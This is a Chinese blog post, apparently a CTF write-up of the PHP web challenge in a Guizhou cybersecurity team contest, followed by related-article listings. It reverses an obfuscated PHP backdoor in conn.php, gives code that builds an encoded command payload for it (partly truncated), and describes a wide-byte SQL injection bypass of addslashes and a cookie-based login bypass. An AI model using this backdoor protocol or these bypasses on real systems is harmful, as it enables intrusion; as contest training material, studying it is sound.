知识竞赛系统 php,贵州省网络安全知识竞赛团体赛Writeup-phpweb部分

最新推荐文章于 2023-06-19 16:34:56 发布
最新推荐文章于 2023-06-19 16:34:56 发布
阅读量159 收藏
点赞数
文章标签: 知识竞赛系统 php

0x01 混淆后门#conn.php

首先还是拖到D盾扫描

b9e3e544a93f15748f404551831b5d36.png

打开conn.php发现底部有那么一串代码:

1d78ed1a039e67c937327d97ec3d761b.png

对这个代码进行分析

首先可以对几个比较简单的变量输出看一下

$s输出内容为create_function

29行可知匿名函数调用了$q中的代码,所以我们打印$q的内容看一下

b81a81d8b72410ce86112a6e90509a7f.png

$q的内容为:

$k="5ac91f7d";$kh="b9615a29bc1d";$kf="24d0b67c2c91";$p="9GmIEgwZ7HiEeclS";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i

代码格式化以后内容如下:

326845f9d4a45758ac513bd4b645db47.png

发现是通过input传入数据,然后需要满足正则且等于才往下执行。

需要了解的几个函数:

ob_start:php 的缓冲输出函数

gzuncompress:解压函数

ob_get_contents:得到缓冲区的数据

x是一个混淆函数,具体如何混淆的可以不去管。

我们只要知道19行他给我们进行了base64deco以及解压缩,那么反过来base64encode以及压缩就好了。

例如我们现在要将phpinfo();加密

逆向出来代码如下:

$k="5ac91f7d";

$kh="b9615a29bc1d";

$kf="24d0b67c2c91";

$p="9GmIEgwZ7HiEeclS";

function x($t,$k){

$c=strlen($k);

$l=strlen($t);

$o="";

for($i=0;$i

for($j=0;($j

$o.=$t{$i}^$k{$j};

}

}return $o;

}

$r=@base64_encode(@x(@gzcompress('phpinfo();'),$k));

echo $r;

31ca7bd616bc8c206ef6c0c41531a803.png

得到字符串:Tf1I8Rmu+y/+trONN2YioDbg

最后与$kh、$kf拼接

得到b9615a29bc1dTf1I8Rmu+y/+trONN2YioDbg24d0b67c2c91

以此发送post数据包。

ae7f556a3fb5cbf92a573f7571963e77.png

0x03 后台上传后门#up.class.php

31e64b60c3101d57d91202c14fe9cdda.png

9df18057441dfd707bf697df8c850ef7.png

第七行代码可见php也在其上传列表内;

然后看看那里调用了这个类

0d0b7711cf85b765d2421dfb32d59987.png

根据目录来看基本都是后台

复现了一下环境:

a69f794b4afd64912c8f9362e3694230.png

发现上传功能是坏的,所以上传功能应该是不行的。只能通过ueditor的那个编辑器上传,所以这个点只能说是作废;

0x03 SQL注入#conntent.php

daa619fca50a749ec32ee5967a90dc19.png

addslashes函数是可被绕过的,如果当时比赛环境使用的是gbk编码的话是可以通过宽字节注入bypass的,他程序几乎都是使用这个函数的,所以直接搜素addslashes就几乎都是sql注入;

注入点非常多,我就不一一写出来了,因为这个程序源码挺大的;

0x04 权限绕过#checklogin.php

27e2257b18f1ff69e8012060ffb8ce1a.png

他这个check也是写的有点搞笑。

判断$_COOKIE是否为空

所以只要请求user字段不为空就OK了(x-forwarded-for是我平时就喜欢加的,可忽略)

642aa63e385475f5445abf5f403181eb.png

#php web的基本就是如上漏洞,难点应该就是最初的那个PHP混淆吧,如果要修复直接删除那段木马即可,据我所知,是能够登陆就可以拿到一个flag。自动化的话也是非常简单,写一个脚本requests的cookie字段填写user=1然后正则提取flag输出到txt,结合burpsuite自动提交flag。

weixin_39812465
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP简单知识竞赛(在线答题)
周梦康的代码碎片
01-19 4806
需要用到两张表:paper和questions CREATE TABLE `paper` ( `Id` int(11) NOT NULL auto_increment, `UserId` int(10) NOT NULL, `SingleChoice` varchar(150) default NULL, `MultipleChoice` varchar(150) defau
javaweb学生竞赛管理系统
QQ58850198的博客
09-04 935
系统是基于JAVA平台开发的一套学生竞赛信息管理的系统。论文主要介绍了本课题的开发背景,所要完成的功能和开发的过程。重点的说明了系统设计的重点、设计思想、难点技术和解决方案。通过功能模块的优化组合实现不同的管理细节,使管理过程实现最大程度的自动化与信息化,并能自动对人工操作环节进行复查,使学生竞赛管理系统出错率降至最低。通过对学生竞赛管理系统进行深入分析和研究,本文从功能模块、数据格式、通用性三个方面进行细化,提出学生竞赛管理系统设计的理论依据和实现的方法。第3章 需求分析与可行性分析 9。
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
【愚公系列】2023年06月 攻防世界-WebWeb_php_wrong_nginx_config)
时光隧道
06-19 3735
PHP代码混淆后门脚本是指在进行PHP代码混淆的过程中,植入恶意代码以实现后门的攻击手段。一旦植入成功,黑客可以通过特定的操作指令,绕过用户身份验证,进入系统内部,获取敏感信息,甚至控制整个系统。常见的PHP代码混淆后门脚本类型有以下几种:直接将后门代码插入到混淆后的PHP代码中。在混淆后的PHP代码中设置特定的注释符号,在注释中写入后门代码,以达到隐藏的目的。在混淆后的PHP代码中创建了一个特定的变量或调用特定的函数,以此触发后门代码。
2021首届安徽省“追日杯”wp
midi
12-06 3345
2021首届安徽省“追日杯”wpweb伊泽瑞尔的phpgotofly综合渗透2_let_me_rcebabypickleezsqlMISC偷走的flag阵法的奥秘CRYPTOesayRSAPWNcodehomeesaystack 安徽省内的比赛,拿了第二 web 伊泽瑞尔的php 原题:https://www.cnblogs.com/nul1/p/11516783.html 根据robots.txt找到.index.php.swp 代码被混淆了, 通过输出$C然后代码格式化得 $k="25ed1bcb";
一套完整的java web 在线答题系统
热门推荐
weixin_38293716的博客
03-11 1万+
用的目前最流行的框架 springboot+hibernate + easyui +mysql 适合入门人员或者学生练习用 代码已分享至百度网盘 链接:https://pan.baidu.com/s/1UdkOUEfjl5h1sOMxhXdKEQ 提取码:yd76 ...
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup
最新发布
05-27
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup解析部分题目
竞赛资料源码-2018全国大学生信息安全竞赛web题出题docker+writeup.zip
01-25
大数据挑战赛、团体程序设计天梯赛、移动应用创新赛、网络技术挑战赛、全国大学生信息安全竞赛、“中国软件杯”大学生软件设计大赛、全国大学生光电设计竞赛、中国机器人及人工智能大赛、“大唐杯”全国大学生移动...
网络安全管理职业技能竞赛Web writeup_合天网安学院-程序员宝宝 - 程序员宝宝1
08-03
网络安全管理职业技能竞赛 Web writeup 是一个关于网络安全的技能竞赛,旨在考察参与者的网络安全知识和技能。该竞赛涵盖了多个方面的网络安全知识,包括@Web 安全、CTF、Nagios、ADO.NET、SDL、OpenSSH 等。 Web ...
网络安全管理职业技能竞赛Web writeup1
08-03
在本次网络安全管理职业技能竞赛Web writeup中,我们将探讨Web安全领域中的一个CTF挑战,涵盖了SQL注入、错误信息处理、Web应用安全等多个方面的知识点。 SQL注入 在本挑战中,我们发现了一个SQL注入漏洞,通过...
信息安全 数据赛 铁人三项_2018信息安全铁人三项数据赛题解
weixin_39533432的博客
12-19 1056
前言由于自己赛区的铁三比赛在最后一场,于是利用闲暇时间做了一下别的赛区的题目,这里给出5月5号比赛的数据赛做题记录题目分享:链接: https://pan.baidu.com/s/1b6bkW-J8vKASr8C2r9vsdQ 密码: nux4题目描述1.黑客攻击的第一个受害主机的网卡IP地址2.黑客对URL的哪一个参数实施了SQL注入3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_...
攻防世界 web高手进阶区 7分题 Web_php_wrong_nginx_config
闵行小鱼塘
08-04 1963
继续ctf的旅程,攻防世界web高手进阶区的7分题,本文是Web_php_wrong_nginx_config的writeup
2018信息安全铁人三项第三赛区数据赛题解
weixin_30894583的博客
12-02 834
题目链接: https://pan.baidu.com/s/1b6bkW-J8vKASr8C2r9vsdQ 密码: nux4 题目描述 1.黑客攻击的第一个受害主机的网卡IP地址 2.黑客对URL的哪一个参数实施了SQL注入 3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_) 4.第一个受害主机网站数据库的名字 5.Joomla后台管理员的密码是多少 6.黑客第一次...
php ctf题,CTF---PHP安全考题
weixin_28736145的博客
03-26 709
1.弱类型比较php中有两种比较的符号 == 与 ===1
攻防世界web进阶区Web_php_wrong_nginx_config详解
hxhxhxhxx的博客
08-11 1139
攻防世界web进阶区Web_php_wrong_nginx_config详解题目详解 题目 打开发现无论我们输入什么他都会弹出网站建设不完全 那么我们使用御剑进行扫描,扫描到了admin和robots.txt 我们访问admin试试 我们接着访问hint.php 和Hack.php 这个打开直接弹窗 详解 好嘞,我们正式开搞! 发现这里有一个cookie为0的值,我们改为1 发现成功登录 进去瞎点一通,发现,只有管理中心可以改变url /admin/admin.php?file=index&
贵州省网络安全知识竞赛团体赛Writeup-phpweb部分
weixin_30247781的博客
09-13 396
0x01 混淆后门#conn.php 首先还是拖到D盾扫描 打开conn.php发现底部有那么一串代码: 对这个代码进行分析 首先可以对几个比较简单的变量输出看一下 $s输出内容为create_function 29行可知匿名函数调用了$q中的代码,所以我们打印$q的内容看一下 $q的内容为: $k="5ac91f7d";$kh="b9615a29b...
PHP混淆后门解剖分析(反抓流量、加密结果)
publicStr的博客
06-09 2512
开始前的例行叨叨:这个后门样本收集于2018红帽杯线下决赛,看到有其他分析收集于自己的服务器,悲剧了(手动笑哭),貌似蓝帽杯也有。调试了很久,被逼着专门学了...
Weevely使用及源码分析(三)
fly小灰灰的专栏
01-30 1782
1 weevely验证机制分析 1.1 源码分析    当生成的php文件是以stegaref_php.tpl文件为模板时,当我们在连接时的命令行中输入任意命运就可以触发php.py文件中的_check_interpreter()函数,_check_interpreter()函数主要功能是随机生成一个命令,”echo”一个从11111到99999大小的随机整数,然后分别调用channels
贵州省网络技术专业的发展邻域及前景
05-24
贵州省网络技术专业的发展邻域包括但不限于以下几个方面: 1. 云计算和大数据:贵州省是中国的大数据产业重要基地之一,拥有大量的数据中心和云计算企业,因此网络技术专业在云计算和大数据领域具有广阔的就业前景。 2. 人工智能和物联网:贵州省正在积极推动人工智能和物联网产业的发展,网络技术专业在这两个领域也有巨大的发展空间和就业机会。 3. 电子商务和数字营销:随着电子商务和数字营销的不断发展,网络技术专业在这些领域也有广泛的应用和就业机会。 贵州省网络技术专业的前景非常广阔,随着信息技术的不断发展和应用,网络技术专业的需求将会越来越大。未来,网络技术专业的人才将在各个领域发挥巨大的作用,为社会的进步和发展做出更大的贡献。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值